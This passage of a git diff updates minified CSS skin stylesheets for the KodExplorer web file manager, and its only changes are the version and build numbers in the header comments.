ound:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}.text-color-set{color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;}@media screen and (max-width:100000px){body{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;} body .x-folder{ background-image:url("../../images/file_icon/icon_others/folder_alpha.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');} body .full-background{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;background:#2d2d2d url('./../../images/wall_page/8.jpg');background-size:cover;background-size:100% 100%;} body .full-background:before{ width:100%;height:100%;display:block;content:" ";background:#2d2d2d url('./../../images/wall_page/8.jpg');background-size:cover;background-size:100% 100%;filter:url(blur.svg#full-background);-webkit-filter:blur(10px);-moz-filter:blur(10px);-ms-filter:blur(10px);filter:blur(10px);} body .btn .font-icon, body .btn.btn-default .font-icon{ color:rgba(255,255,255,0.8);} body .aui-outer .btn .font-icon, body .edit-main .btn .font-icon{ color:#999;} body .common-footer{ background:rgba(234,234,234,0.1);color:rgba(255,255,255,0.6);border-top:1px solid rgba(234,234,234,0.15);} body .common-footer a{ color:rgba(255,255,255,0.8);} body .context-menu-list{ box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;background:rgba(255,255,255,0.95);} body .context-menu-list .context-menu-item{ line-height:25px;height:25px;padding:0 15px 0 20px;} body .aui-outer{ *border:1px solid #ccc;border:1px solid #ccc \0/IE9;box-shadow:0px 5px 20px rgba(0,0,0,0.5), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-state-focus .aui-outer{ box-shadow:0px 5px 30px rgba(0,0,0,0.7), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-buttons{ border-top:1px solid rgba(255,255,255,0.2);} body div.dialog-simple .aui-title{ border-radius:0;} body .aui-buttons button.aui-state-highlight{ background:linear-gradient(to right,#44abf6,#2865e2);} body .aui-state-focus .aui-title, body .aui-title{ background-color:rgba(0,0,0,0.8);box-shadow:0 1px 0 rgba(255,255,255,0.15);background:#2d2d2d url('./../../images/wall_page/8.jpg');background-size:cover;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;opacity:0.95;} body .dropdown-menu > li > a:hover, body .dropdown-menu .this a, body .dropdown-menu > li > a:focus{ background:linear-gradient(to right,#44abf6,#2865e2);} body .topbar{ background:rgba(234,234,234,0.23);box-shadow:0 0 6px rgba(0,0,0,0.2);border-bottom:1px solid rgba(255,255,255,0.01);border:none;} body .topbar .content{ border-bottom:none;} body .topbar .content .topbar-menu{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-color:rgba(234,234,234,0.05);} body .topbar .content .open .topbar-menu, body .topbar .content .topbar-menu:hover, body .topbar .content .topbar-menu.this{ background:rgba(234,234,234,0.23);} body .topbar .content .share-title, body .topbar .content .share-info, body .topbar .content .share-info .time{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .topbar .content .top-right div.share-info-user{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main{ background:rgba(221,221,221,0.02);} body .frame-main .frame-right .frame-right-main .tools{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:1px 2px 15px rgba(0,0,0,0.2);} body .frame-main .frame-right .frame-right-main .tools .font-icon{ color:#fff;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover .dropdown-toggle, body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open .dropdown-toggle{ background:rgba(234,234,234,0.23);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-bg{ background:#666;} body .frame-main .frame-right .file-select-info{ background:#000;background:rgba(0,0,0,0.2);color:#aaa;opacity:0.5;filter:alpha(opacity=50);} body div.frame-header{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.05);} body div.frame-main .frame-left{ background:rgba(221,221,221,0.02);border-right:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box{ background:rgba(221,221,221,0.02);border-right:none;border-top:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box .cell{ background:rgba(221,221,221,0.02);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border:1px solid rgba(234,234,234,0.05);box-shadow:0 0 10px rgba(0,0,0,0.1);} body div.frame-main .frame-left .bottom-box .cell:hover{ background:rgba(234,234,234,0.16);} body .user-space-info{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .group-space-use{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .btn-default{ text-shadow:none;} body #btn-history-back, body #home, body #fav{ border-right-color:transparent;} body .btn#home{ border-radius:3px 0 0 3px;} body .btn#up, body .btn#search{ border-radius:0 3px 3px 0;} body .input-style{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input, body .frame-header .header-content .header-right input:focus{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .button-style{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .button-style:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .button-style:active, body .button-style.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .frame-main .frame-right .frame-right-main .tools button.btn, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn, body .frame-header .header-content button.btn, body .frame-header .header-content .header-right .btn-default, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .frame-main .frame-right .frame-right-main .tools button.btn:hover, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:hover, body .frame-header .header-content button.btn:hover, body .frame-header .header-content .header-right .btn-default:hover, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .frame-main .frame-right .frame-right-main .tools button.btn:active, body .frame-main .frame-right .frame-right-main .tools button.btn.active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn.active, body .frame-header .header-content button.btn:active, body .frame-header .header-content button.btn.active, body .frame-header .header-content .header-right .btn-default:active, body .frame-header .header-content .header-right .btn-default.active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .btn-default{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .header-middle .btn-default:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .header-middle .btn-default:active, body .header-middle .btn-default.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .disable .font-icon{ opacity:0.6;filter:alpha(opacity=60);} body .header-middle #yarnball{ border-right-color:transparent;background:none;border:1px solid rgba(234,234,234,0.23);box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball-input input.path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball-input{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball .yarnball .yarnlet a{ background:none;color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball .yarnball .yarnlet a::after{ content:'/';padding-left:5px;} body .header-middle #yarnball .yarnball .yarnlet a:hover{ color:rgba(234,234,234,0.23);} body .header-middle #yarnball .yarnball .yarnlet a.curDropToPath{ color:#f60;} body .header-middle #yarnball .yarnball .yarnlet a, body .header-middle #yarnball .yarnball .yarnlet a:link, body .header-middle #yarnball .yarnball .yarnlet a:visited{ padding:0px 8px 0px 8px;margin-left:-10px;} body .header-middle #yarnball .yarnball .yarnlet .left-yarn{ background:none;} body .frame-header .header-content .btn-default:active, body .frame-header .header-content .btn-default.active{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .file-draging.file-list-icon div.file .filename, body .file-draging.file-list-list div.file .filename, body .file-draging.file-list-split div.file .filename{ visibility:hidden;} body .file-draging.file-list-icon div.file.handle_target .filename, body .file-draging.file-list-list div.file.handle_target .filename, body .file-draging.file-list-split div.file.handle_target .filename{ visibility:visible;} body .file-list-icon .file{ color:#fff;} body .file-list-list .file{ border-bottom:1px solid rgba(234,234,234,0.05);} body .file-list-list .file.file2{ background:rgba(221,221,221,0.02);} body .file-continer .file, body .file-continer .file2{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;text-shadow:0 0 1px #fff;} body .file-continer .file.hover, body .file-continer .file.select-split-parent, body .file-continer .file2.hover, body .file-continer .file2.select-split-parent{ filter:none;background:rgba(234,234,234,0.1);border:1px solid rgba(234,234,234,0.1);} body .file-continer .file.select, body .file-continer .file.file-select-drag-temp, body .file-continer .file2.select, body .file-continer .file2.file-select-drag-temp{ background:rgba(234,234,234,0.16);border:1px solid rgba(234,234,234,0.23);border-bottom:1px solid rgba(234,234,234,0.23);} body .file-list-split .split-box{ border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);} body .file-list-split .split-box.split-hover{ background:rgba(5,5,5,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(5,5,5,0.2) inset;border-bottom-color:rgba(255,255,255,0.2);} body .file-list-split .split-box.split-select{ background:rgba(0,0,0,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(0,0,0,0.2) inset;border-left:1px solid #eee;border-color:rgba(0,0,0,0.2);margin-left:-1px;border-bottom:5px solid #2196F3;border-bottom-color:rgba(255,255,255,0.4);} body .file-list-split .file .children-open{ background:rgba(255,255,255,0.01);} body .file-list-split .file .children-open i.font-icon{ color:#fff;} body .context-menu-list .context-menu-item.hover{ background:linear-gradient(to right,#44abf6,#2865e2);} body #list-type-header{ background:none;} body #main-title{ background:rgba(234,234,234,0.1);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:0px 5px 5px rgba(0,0,0,0.05);} body #main-title .this{ background:rgba(234,234,234,0.16);} body #main-title .filename, body #main-title .filesize, body #main-title .filetype, body #main-title .filetime{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-right:1px solid rgba(234,234,234,0.23);} body #main-title .filename:hover, body #main-title .filesize:hover, body #main-title .filetype:hover, body #main-title .filetime:hover{ background:rgba(234,234,234,0.16);} body#page-editor .frame-main .tools-left{ background:rgba(234,234,234,0.15);border-bottom:1px solid rgba(234,234,234,0.05);} body#page-editor .frame-main .tools-left a{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body#page-editor .frame-main .frame-right .frame-right-main .frame{ border-left:1px solid rgba(234,234,234,0.05);} body #body .menu-left, body #body .app-menu-left{ background:rgba(230,230,230,0.2);background:#2d2d2d url('./../../images/wall_page/8.jpg');background-size:cover;} body #body .menu-left h1, body #body .app-menu-left h1{ color:#fff;font-weight:400;} body #body .menu-left .setting a, body #body .app-menu-left .setting a{ color:#fff;} body #body .menu-left .setting a:hover, body #body .app-menu-left .setting a:hover{ background:rgba(242,242,242,0.2);} body #body .menu-left .setting a.selected, body #body .app-menu-left .setting a.selected{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.7);color:#fff;} body #body .menu-left .line, body #body .app-menu-left .line{ color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);} body #body .user-list a{ color:#2a6496;} body #body .system-content .left-frame .left-content .ztree li a{ text-shadow:none;} body #body .system-content .left-frame .left-content .ztree li a.hover{ background:#eee;border-color:#eee;} body #body .system-content .left-frame .left-content .ztree li a.curSelectedNode{ background:#63acff;border:1px solid #63acff;} body#page-explorer .task-tab, body#page-editor .task-tab{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.3);} body .ztree li a{ color:#fff;border-radius:3px;margin:0 4px 0 4px;background:transparent;border-color:transparent;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .ztree li a:hover{ background:rgba(234,234,234,0.15);border-color:transparent;} body .ztree li a span.button.switch{ opacity:0.8;filter:alpha(opacity=80);} body .ztree li a span.button.switch:after{ color:#cccccc;} body .ztree li a span.button.switch.noline_open:after, body .ztree li a span.button.switch.noline_open_hover:after{ color:#e6e6e6;} body .ztree li a.curSelectedNode, body .ztree li a.curDropTreeNode{ background:rgba(234,234,234,0.33);border-color:transparent;} body .ztree li a.curSelectedNode .noline_open:after, body .ztree li a.curSelectedNode .noline_open_hover:after, body .ztree li a.curSelectedNode .noline_close:after, body .ztree li a.curDropTreeNode .noline_open:after, body .ztree li a.curDropTreeNode .noline_open_hover:after, body .ztree li a.curDropTreeNode .noline_close:after{ color:#fff !important;} body .ztree.group-list-tree li a{ color:#444;text-shadow:none;} body.setting-page .ztree li a{ color:inherit;}} -/* ver 4.05(2017-08-26) [build 1503738071.4865] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.3739] */ \ No newline at end of file diff --git a/static/style/skin/alpha_image_sky.css b/static/style/skin/alpha_image_sky.css index ea17ecf..20844dd 100755 --- a/static/style/skin/alpha_image_sky.css +++ b/static/style/skin/alpha_image_sky.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.8144] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.6926] */ body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-le